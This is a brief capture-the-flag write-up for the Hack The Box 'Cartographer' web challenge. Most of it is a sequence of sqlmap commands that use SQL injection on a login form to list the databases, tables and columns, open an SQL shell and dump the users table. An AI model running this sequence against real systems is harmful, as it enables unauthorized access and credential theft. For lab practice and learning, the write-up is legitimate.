Solution to Hack The Box Challenge - Cartographer
It's a web that exposes you a login form and you must discover the username and password to gain access.
SQL Injection using SQLMap.
SQLMap - automatic SQL injection
Tell SQLMap to detect vulnerabilites sending a payload example (extracted from the form)
sqlmap -u --data="username=asd&password=asd"
SQL detect a vulnerability that you can exploit. So you tell it to list all the dbs
sqlmap -u --data="username=asd&password=asd" --dbs
It has the dbs. So list the tables
sqlmap -u --data="username=asd&password=asd" --tables -D cartographer
It has the tables. So list the columns of the table that I was interested.
sqlmap -u --data="username=asd&password=asd" --colums -T users -D cartographer
It has all the info. So I want to use a sql query to consume it. SQLMap can give me access to a SQL console using this command
sqlmap -u --data="username=asd&password=asd" -D cartographer --sql-shell
Send a query to get the accounts.
sql-shell> SELECT * FROM cartographer.users